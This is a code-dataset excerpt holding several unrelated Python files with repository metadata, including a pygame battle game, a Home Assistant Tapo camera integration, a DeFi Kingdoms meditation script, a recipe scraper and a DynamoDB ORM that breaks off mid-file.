                request.session['django_language'] = profile.language
                translation.activate(profile.language)
                request.LANGUAGE_CODE = translation.get_language()
37.441176
69
0.624509
1,101
0.864886
0
0
0
0
0
0
265
0.20817
4c72f9ae2886173a745e73873beb49821cbc3a3f
691
py
Python
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
null
null
null
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
1
2021-06-01T22:23:13.000Z
2021-06-01T22:23:13.000Z
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
null
null
null
from enum import Enum


class CustomEnum(Enum):
    @classmethod
    def has_value(cls, value):
        return any(value == item.value for item in cls)

    @classmethod
    def from_value(cls, value):
        found_element = None

        if cls.has_value(value):
            found_element = cls(value)

        return found_element


class Direction(CustomEnum):
    EAST = 0x1
    SOUTH = 0x2
    WEST = 0x3
    NORTH = 0x4


class Action(CustomEnum):
    FLASH_RED = 0x32
    GREEN = 0x33
    FLASH_GREEN = 0x34
    PEDESTRIAN = 0x35
    EMERGENCY = 0x37


class Intersection(CustomEnum):
    A = 0x62
    B = 0x61
    BOTH = 0x63


class Mode(CustomEnum):
    LIVE = 0
    SIMULATION = 1
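For illustration, a minimal usage sketch of the CustomEnum helpers above (not part of the original file):

assert Direction.has_value(0x2)
assert Direction.from_value(0x2) is Direction.SOUTH
assert Action.from_value(0x99) is None   # unknown values come back as None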
18.675676
55
0.622287
660
0.955137
0
0
275
0.397974
0
0
0
0
4c73a2fb986309ca0a2f6912149adaf74509a6fc
716
py
Python
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
import fileinput

counts = {}
for line in fileinput.input():
    line = line.strip()
    p1, p2 = line.split('>')
    p1 = p1[:-2]
    x1, y1 = p1.split(',')
    x1 = int(x1)
    y1 = int(y1)
    p2 = p2[1:]
    x2, y2 = p2.split(',')
    x2 = int(x2)
    y2 = int(y2)

    if x1 == x2:
        dx = 0
    elif x1 > x2:
        dx = -1
    else:
        dx = 1
    if y1 == y2:
        dy = 0
    elif y1 > y2:
        dy = -1
    else:
        dy = 1

    x = x1
    y = y1
    while True:
        pt = (x, y)
        counts[pt] = counts.get(pt, 0) + 1
        if x == x2 and y == y2:
            break
        x += dx
        y += dy

n = 0
for _, ct in counts.items():
    if ct > 1:
        n += 1
print(n)
15.911111
42
0.391061
0
0
0
0
0
0
0
0
9
0.01257
4c73c6bd43cad4b6997238ea62e6e2c529f20e54
1,635
py
Python
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
90
2021-10-17T19:36:45.000Z
2022-03-31T17:19:43.000Z
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
13
2021-11-13T00:19:31.000Z
2022-03-20T15:13:22.000Z
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
71
2021-11-05T03:00:41.000Z
2022-03-30T06:16:25.000Z
import logging
from web3 import Web3
import sys
import time

import meditation.meditation as meditation

if __name__ == "__main__":
    log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
    logger = logging.getLogger("DFK-meditation")
    logger.setLevel(logging.DEBUG)
    logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)

    rpc_server = 'https://api.harmony.one'
    logger.info("Using RPC server " + rpc_server)

    private_key = None  # set private key
    account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
    gas_price_gwei = 10
    tx_timeout_seconds = 30
    w3 = Web3(Web3.HTTPProvider(rpc_server))

    active_meditations = meditation.get_active_meditations(account_address, rpc_server)
    logger.info("Pending meditation on address " + str(account_address) + ": " + str(active_meditations))

    level = 1
    hero_id = 1
    required_runes = meditation.get_required_runes(level, rpc_server)
    meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'),
                                meditation.stat2id('luck'), meditation.ZERO_ADDRESS, private_key,
                                w3.eth.getTransactionCount(account_address), gas_price_gwei,
                                tx_timeout_seconds, rpc_server, logger)
    hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
    logger.info("Pending meditation " + str(hero_meditation))
    time.sleep(5)
    meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
                                   gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
41.923077
127
0.720489
0
0
0
0
0
0
0
0
264
0.161468
4c752c3e0e33ba7c7da469ab66cb6adfa9bb958a
669
py
Python
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
3
2018-02-28T14:22:53.000Z
2022-01-24T02:38:22.000Z
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
null
null
null
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
null
null
null
import time


class Interval(object):
    def __init__(self, delay_time: int):
        self.delay_time = delay_time
        self.current_time = 0

    @staticmethod
    def now():
        return time.gmtime().tm_sec

    def should_run(self) -> bool:
        if self.current_time == 0:
            self.current_time = Interval.now()
            return True
        return self.is_done()

    def is_done(self) -> bool:
        timestamp = Interval.now()
        return self.current_time + self.delay_time < timestamp or \
            self.current_time > timestamp

    def start(self) -> int:
        self.current_time = Interval.now()
        return self.current_time
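For illustration, a minimal polling-loop sketch for the Interval class above (not part of the original file; do_work is a hypothetical task):

interval = Interval(10)   # at most one run per 10-second window
while True:
    if interval.should_run():
        do_work()         # hypothetical
        interval.start()  # reset the window
    time.sleep(1)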
24.777778
67
0.606876
654
0.977578
0
0
64
0.095665
0
0
0
0
4c76367fcd11568b786d20b9e43e17b970ff6e48
2,329
py
Python
servers/python/coweb/bot/wrapper/object.py
opencoweb/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
83
2015-01-05T19:02:57.000Z
2021-11-19T02:48:09.000Z
servers/python/coweb/bot/wrapper/object.py
xuelingxiao/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
3
2015-12-16T13:49:33.000Z
2019-06-17T13:38:50.000Z
servers/python/coweb/bot/wrapper/object.py
xuelingxiao/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
14
2015-04-29T22:36:53.000Z
2021-11-18T03:24:29.000Z
'''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase

log = logging.getLogger('coweb.bot')


class ObjectBotWrapper(BotWrapperBase):
    def __init__(self, manager, botClass, serviceName, serviceToken, appData):
        self.serviceName = serviceName
        self.appData = appData
        self._serviceToken = serviceToken
        self._manager = weakref.proxy(manager)
        self._bot = botClass(self, serviceName, appData)
        self._ioLoop = tornado.ioloop.IOLoop.instance()

        # asynchronously inform local manager we're ready
        self.add_callback(self._manager.on_bot_ready,
                          serviceName, serviceToken, self)

    def on_message(self, mtdName, *args):
        '''Proxy messages from manager to bot impl.'''
        try:
            mtd = getattr(self._bot, mtdName)
        except AttributeError:
            # bot isn't listening for this message type
            return
        # keep sync with manager so we can catch exceptions, else exception
        # fires in context of original request which is wrong, it's a bot
        # error not a client error
        try:
            mtd(*args)
        except Exception:
            log.exception('bot error')

    def reply(self, replyToken, data):
        '''Sends a private reply to a requestor.'''
        self._manager.on_bot_response(self.serviceName, replyToken, data)

    def publish(self, data):
        '''Sends a public reply to subscribes on a bot subchannel.'''
        self._manager.on_bot_publish(self.serviceName, data)

    def add_callback(self, callback, *args, **kwargs):
        '''Schedule a callback in the main loop.'''
        f = functools.partial(callback, *args, **kwargs)
        self._ioLoop.add_callback(f)

    def add_timer(self, delay, callback, *args, **kwargs):
        '''Add a one-shot timer that schedules a main loop callback.'''
        f = functools.partial(callback, *args, **kwargs)
        return self._ioLoop.add_timeout(time.time() + delay, f)

    def remove_timer(self, timer):
        '''Remove a one-shot timer.'''
        self._ioLoop.remove_timeout(timer)
35.287879
78
0.653499
2,015
0.865178
0
0
0
0
0
0
715
0.306999
4c76baa8499aec4813a3d47e851bd3cbe62268bf
6,193
py
Python
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
22
2021-01-13T10:21:42.000Z
2022-03-10T00:06:05.000Z
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
1
2021-01-14T17:02:41.000Z
2021-01-14T20:23:38.000Z
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
33
2021-01-17T08:52:38.000Z
2022-03-28T10:36:36.000Z
import pygame
import random

pygame.init()

clock = pygame.time.Clock()
fps = 60

#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel

screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')

#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False

#define fonts
font = pygame.font.SysFont('Times New Roman', 26)

#define colours
red = (255, 0, 0)
green = (0, 255, 0)

#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()

#create function for drawing text
def draw_text(text, font, text_col, x, y):
    img = font.render(text, True, text_col)
    screen.blit(img, (x, y))

#function for drawing background
def draw_bg():
    screen.blit(background_img, (0, 0))

#function for drawing panel
def draw_panel():
    #draw panel rectangle
    screen.blit(panel_img, (0, screen_height - bottom_panel))
    #show knight stats
    draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
    for count, i in enumerate(bandit_list):
        #show name and health
        draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)

#fighter class
class Fighter():
    def __init__(self, x, y, name, max_hp, strength, potions):
        self.name = name
        self.max_hp = max_hp
        self.hp = max_hp
        self.strength = strength
        self.start_potions = potions
        self.potions = potions
        self.alive = True
        self.animation_list = []
        self.frame_index = 0
        self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
        self.update_time = pygame.time.get_ticks()
        #load idle images
        temp_list = []
        for i in range(8):
            img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
            img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
            temp_list.append(img)
        self.animation_list.append(temp_list)
        #load attack images
        temp_list = []
        for i in range(8):
            img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
            img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
            temp_list.append(img)
        self.animation_list.append(temp_list)
        self.image = self.animation_list[self.action][self.frame_index]
        self.rect = self.image.get_rect()
        self.rect.center = (x, y)

    def update(self):
        animation_cooldown = 100
        #handle animation
        #update image
        self.image = self.animation_list[self.action][self.frame_index]
        #check if enough time has passed since the last update
        if pygame.time.get_ticks() - self.update_time > animation_cooldown:
            self.update_time = pygame.time.get_ticks()
            self.frame_index += 1
        #if the animation has run out then reset back to the start
        if self.frame_index >= len(self.animation_list[self.action]):
            self.idle()

    def idle(self):
        #set variables to idle animation
        self.action = 0
        self.frame_index = 0
        self.update_time = pygame.time.get_ticks()

    def attack(self, target):
        #deal damage to enemy
        rand = random.randint(-5, 5)
        damage = self.strength + rand
        target.hp -= damage
        #check if target has died
        if target.hp < 1:
            target.hp = 0
            target.alive = False
        #set variables to attack animation
        self.action = 1
        self.frame_index = 0
        self.update_time = pygame.time.get_ticks()

    def draw(self):
        screen.blit(self.image, self.rect)


class HealthBar():
    def __init__(self, x, y, hp, max_hp):
        self.x = x
        self.y = y
        self.hp = hp
        self.max_hp = max_hp

    def draw(self, hp):
        #update with new health
        self.hp = hp
        #calculate health ratio
        ratio = self.hp / self.max_hp
        pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
        pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))


knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)

bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)

knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)

run = True
while run:

    clock.tick(fps)

    #draw background
    draw_bg()

    #draw panel
    draw_panel()
    knight_health_bar.draw(knight.hp)
    bandit1_health_bar.draw(bandit1.hp)
    bandit2_health_bar.draw(bandit2.hp)

    #draw fighters
    knight.update()
    knight.draw()
    for bandit in bandit_list:
        bandit.update()
        bandit.draw()

    #control player actions
    #reset action variables
    attack = False
    potion = False
    target = None
    #make sure mouse is visible
    pygame.mouse.set_visible(True)
    pos = pygame.mouse.get_pos()
    for count, bandit in enumerate(bandit_list):
        if bandit.rect.collidepoint(pos):
            #hide mouse
            pygame.mouse.set_visible(False)
            #show sword in place of mouse cursor
            screen.blit(sword_img, pos)
            if clicked == True:
                attack = True
                target = bandit_list[count]

    #player action
    if knight.alive == True:
        if current_fighter == 1:
            action_cooldown += 1
            if action_cooldown >= action_wait_time:
                #look for player action
                #attack
                if attack == True and target != None:
                    knight.attack(target)
                    current_fighter += 1
                    action_cooldown = 0

    #enemy action
    for count, bandit in enumerate(bandit_list):
        if current_fighter == 2 + count:
            if bandit.alive == True:
                action_cooldown += 1
                if action_cooldown >= action_wait_time:
                    #attack
                    bandit.attack(knight)
                    current_fighter += 1
                    action_cooldown = 0
            else:
                current_fighter += 1

    #if all fighters have had a turn then reset
    if current_fighter > total_fighters:
        current_fighter = 1

    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            run = False
        if event.type == pygame.MOUSEBUTTONDOWN:
            clicked = True
        else:
            clicked = False

    pygame.display.update()

pygame.quit()
23.911197
101
0.707089
2,459
0.397061
0
0
0
0
0
0
1,160
0.187308
4c791be103564830f1d4250200840c0dccc964ac
651
py
Python
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
    for c in range(0, 3):
        matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
    for c in range(0, 3):
        print(f'[{matriz[l][c]:^5}]', end='')
        if matriz[l][c] % 2 == 0:
            soma += matriz[l][c]
    print()
for l in range(0, 3):
    col3 += matriz[l][2]
for c in range(0, 3):
    if c == 0:
        maior = matriz[1][c]
    elif matriz[1][c] > maior:
        maior = matriz[1][c]
print(f'The sum of the even numbers is {soma}')
print(f'The sum of the values in the 3rd column is {col3}')
print(f'The largest number in the 2nd row is {maior}')
31
50
0.506912
0
0
0
0
0
0
0
0
158
0.24159
4c79ab828e049f734329ac9fd7817c526a06676d
6,777
py
Python
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
import onvif
import os
import asyncio
import urllib.parse

from onvif import ONVIFCamera
from pytapo import Tapo

from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame


def registerController(host, username, password):
    return Tapo(host, username, password)


async def isRtspStreamWorking(hass, host, username, password):
    _ffmpeg = hass.data[DATA_FFMPEG]
    ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
    username = urllib.parse.quote_plus(username)
    password = urllib.parse.quote_plus(password)
    streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
    image = await asyncio.shield(
        ffmpeg.get_image(
            streaming_url,
            output_format=IMAGE_JPEG,
        )
    )
    return not image == b""


async def initOnvifEvents(hass, host, username, password):
    device = ONVIFCamera(
        host,
        2020,
        username,
        password,
        f"{os.path.dirname(onvif.__file__)}/wsdl/",
        no_cache=True,
    )
    try:
        await device.update_xaddrs()
        device_mgmt = device.create_devicemgmt_service()
        device_info = await device_mgmt.GetDeviceInformation()
        if "Manufacturer" not in device_info:
            raise Exception("Onvif connection has failed.")

        return device
    except Exception:
        pass

    return False


async def getCamData(hass, controller):
    camData = {}
    presets = await hass.async_add_executor_job(controller.isSupportingPresets)
    camData["user"] = controller.user
    camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
    camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
    try:
        motionDetectionData = await hass.async_add_executor_job(
            controller.getMotionDetection
        )
        motion_detection_enabled = motionDetectionData["enabled"]
        if motionDetectionData["digital_sensitivity"] == "20":
            motion_detection_sensitivity = "low"
        elif motionDetectionData["digital_sensitivity"] == "50":
            motion_detection_sensitivity = "normal"
        elif motionDetectionData["digital_sensitivity"] == "80":
            motion_detection_sensitivity = "high"
        else:
            motion_detection_sensitivity = None
    except Exception:
        motion_detection_enabled = None
        motion_detection_sensitivity = None
    camData["motion_detection_enabled"] = motion_detection_enabled
    camData["motion_detection_sensitivity"] = motion_detection_sensitivity

    try:
        privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
        privacy_mode = privacy_mode["enabled"]
    except Exception:
        privacy_mode = None
    camData["privacy_mode"] = privacy_mode

    try:
        alarmData = await hass.async_add_executor_job(controller.getAlarm)
        alarm = alarmData["enabled"]
        alarm_mode = alarmData["alarm_mode"]
    except Exception:
        alarm = None
        alarm_mode = None
    camData["alarm"] = alarm
    camData["alarm_mode"] = alarm_mode

    try:
        commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
        day_night_mode = commonImageData["image"]["common"]["inf_type"]
    except Exception:
        day_night_mode = None
    camData["day_night_mode"] = day_night_mode

    try:
        led = await hass.async_add_executor_job(controller.getLED)
        led = led["enabled"]
    except Exception:
        led = None
    camData["led"] = led

    try:
        auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
        auto_track = auto_track["enabled"]
    except Exception:
        auto_track = None
    camData["auto_track"] = auto_track

    if presets:
        camData["presets"] = presets
    else:
        camData["presets"] = {}

    return camData


async def update_listener(hass, entry):
    """Handle options update."""
    host = entry.data.get(CONF_IP_ADDRESS)
    username = entry.data.get(CONF_USERNAME)
    password = entry.data.get(CONF_PASSWORD)
    motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
    cloud_password = entry.data.get(CLOUD_PASSWORD)
    try:
        if cloud_password != "":
            tapoController = await hass.async_add_executor_job(
                registerController, host, "admin", cloud_password
            )
        else:
            tapoController = await hass.async_add_executor_job(
                registerController, host, username, password
            )
        hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
    except Exception:
        LOGGER.error(
            "Authentication to Tapo camera failed."
            + " Please restart the camera and try again."
        )

    for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
        entity._host = host
        entity._username = username
        entity._password = password
    if hass.data[DOMAIN][entry.entry_id]["events"]:
        await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
    if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
        await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
        hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False

    if motionSensor:
        await setupOnvif(hass, entry, host, username, password)


async def setupOnvif(hass, entry, host, username, password):
    hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
        hass, host, username, password
    )

    if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
        hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
            hass,
            hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
            f"{entry.entry_id}_tapo_events",
        )

        hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
            hass, entry
        )


async def setupEvents(hass, entry):
    if not hass.data[DOMAIN][entry.entry_id]["events"].started:
        events = hass.data[DOMAIN][entry.entry_id]["events"]
        if await events.async_start():
            if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
                hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
                hass.async_create_task(
                    hass.config_entries.async_forward_entry_setup(
                        entry, "binary_sensor"
                    )
                )
            return True
        else:
            return False
34.93299
86
0.665044
0
0
0
0
0
0
6,235
0.920024
903
0.133245
4c79db5803090229f5cee46e595e5f692bd63c32
1,652
py
Python
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name:        test_uidattr
# Purpose:     Test driver for module 'uidattr'
#
# Author:      Michael Amrhein ([email protected])
#
# Copyright:   (c) 2018 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$

"""Test driver for module 'uidattr'"""

import unittest
from uuid import uuid1

from camd3.infrastructure.component import (
    Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
    UUIDGenerator, uuid_generator)


# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator:  # noqa: D103
    while True:
        yield uuid1()


class ExplID(Component):

    id = UniqueIdAttribute(uid_gen=custom_uuid_generator())

    def __init__(self):
        self.__class__.id.set_once(self)


class ImplID(Component):

    id = UniqueIdAttribute()

    def __init__(self):
        self.__class__.id.set_once(self)


class UniqueIdAttributeTest(unittest.TestCase):

    def setUp(self):
        register_utility(uuid_generator(), UUIDGenerator)
        self.cid = ImplID()

    def test_init(self):
        cid = ImplID()
        self.assertIsNotNone(cid.id)
        self.assertIsNotNone(cid._id)

    def test_uniqueness(self):
        ids = {self.cid.id}
        for i in range(10):
            cid = ExplID()
            self.assertNotIn(cid.id, ids)
            ids.add(cid.id)


if __name__ == '__main__':  # pragma: no cover
    unittest.main()
23.6
78
0.578087
735
0.444915
114
0.069007
0
0
0
0
487
0.294794
4c7a9873c160d856f0a448855b2b79215e8191fc
883
py
Python
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
import requests
import time
from bs4 import BeautifulSoup


def get_web_page(url):
    resp = requests.get(
        url=url,
    )
    if resp.status_code != 200:
        print('Invalid url:', resp.url)
        return None
    else:
        return resp.text


def get_articles(dom):
    soup = BeautifulSoup(dom, 'html.parser')
    tag = soup.find_all('a', 'recipe-name')
    articles = tag
    return articles


def run():
    page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
    if page:
        current_articles = get_articles(page)
        i = 1
        s = ''
        for post in current_articles:
            temp = str(post)
            num = int(temp.find("\" href="))
            # print('The Number {0}: {1}'.format(i, temp[35:num]))
            s = s + 'The Number {0}: {1}\n'.format(i, temp[35:num])
            i = i + 1
        return s
22.641026
76
0.551529
0
0
0
0
0
0
0
0
182
0.206116
4c7abb53711251283db1d2b1869388b7608f3858
21,493
py
Python
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
1
2020-12-29T20:49:27.000Z
2020-12-29T20:49:27.000Z
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
69
2020-11-16T21:16:44.000Z
2021-04-14T17:16:33.000Z
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
null
null
null
import uuid from abc import ABC, abstractmethod from collections import defaultdict from typing import Union from boto3.dynamodb.conditions import Attr as BotoAttr from boto3.dynamodb.conditions import Key as BotoKey from awstin.dynamodb.utils import from_decimal, to_decimal class NotSet: """ A value of an attribute on a data model is not present in a DynamoDB result """ def __str__(self): return "<<Attribute not set>>" def __repr__(self): return "<<Attribute not set>>" NOT_SET = NotSet() class BaseAttribute: def __init__(self, attribute_name: Union[str, None] = None): """ Parameters ---------- attribute_name : str, optional Name of the property in the DynamoDB table. Defaults to the name of the attribute on the DynamoModel class. """ # Set by user self._attribute_name = attribute_name # Set by Model self._name_on_model = None @property def _awstin_name(self): if self._attribute_name is not None: return self._attribute_name else: return self._name_on_model def __getattr__(self, name): """ Support for nested mapping queries """ try: return super().__getattr__(name) except AttributeError: return type(self)(attribute_name=f"{self._awstin_name}.{name}") def __getitem__(self, index): """ Support for nested container queries """ return type(self)(attribute_name=f"{self._awstin_name}[{index}]") # --- Query and scan filter expressions --- def begins_with(self, value): """ Filter results by a key or attribute beginning with a value Parameters ---------- value : str Starting string for returned results """ return self._query_type(self._awstin_name).begins_with(to_decimal(value)) def between(self, low, high): """ Filter results by range (inclusive) Parameters ---------- low : Any Low end of the range high : Any High end of the range """ return self._query_type(self._awstin_name).between( to_decimal(low), to_decimal(high), ) def __eq__(self, value): return self._query_type(self._awstin_name).eq(to_decimal(value)) def __gt__(self, value): return self._query_type(self._awstin_name).gt(to_decimal(value)) def __ge__(self, value): return self._query_type(self._awstin_name).gte(to_decimal(value)) def __lt__(self, value): return self._query_type(self._awstin_name).lt(to_decimal(value)) def __le__(self, value): return self._query_type(self._awstin_name).lte(to_decimal(value)) def attribute_type(self, value): """ Filter results by attribute type Parameters ---------- value : str Index for a DynamoDB attribute type (e.g. "N" for Number) """ return BotoAttr(self._awstin_name).attribute_type(to_decimal(value)) def contains(self, value): """ Filter results by attributes that are containers and contain the target value Parameters ---------- values : Any Result must contain this item """ return BotoAttr(self._awstin_name).contains(to_decimal(value)) def exists(self): """ Filter results by existence of an attribute """ return BotoAttr(self._awstin_name).exists() def in_(self, values): """ Filter results by existence in a set Parameters ---------- values : list of Any Allowed values of returned results """ in_values = [to_decimal(value) for value in values] return BotoAttr(self._awstin_name).is_in(in_values) def __ne__(self, value): return BotoAttr(self._awstin_name).ne(to_decimal(value)) def not_exists(self): """ Filter results by non-existence of an attribute """ return BotoAttr(self._awstin_name).not_exists() def size(self): """ Filter by size of a collection """ return Size(self._awstin_name) # --- Update expressions --- def set(self, expression): """ Set an attribute to a new value. 
Corresponds to SET as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand New value, or an expression defining a new value """ return SetOperator(self, UpdateOperand(expression)) def remove(self): """ Remove an attribute. Corresponds to REMOVE as part of the update expression in ``Table.update_item``. """ return RemoveOperator(self) def add(self, expression): """ Add to an attribute (numerical add or addition to a set). Corresponds to ADD as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand Value to add """ return AddOperator(self, UpdateOperand(expression)) def delete(self, expression): """ Delete part of a set attribute. Corresponds to DELETE as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand Value to delete """ return DeleteOperator(self, UpdateOperand(expression)) def __add__(self, other): return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+") def __sub__(self, other): return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-") def __radd__(self, other): return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+") def __rsub__(self, other): return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-") def if_not_exists(self, value): """ Conditionally return a value if this attribute doesn't exist on the model """ return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value)) class Key(BaseAttribute): """ Used to define and query hash and sort key attributes on a dynamodb table data model """ _query_type = BotoKey class Attr(BaseAttribute): """ Used to define and query non-key attributes on a dynamodb table data model """ _query_type = BotoAttr def 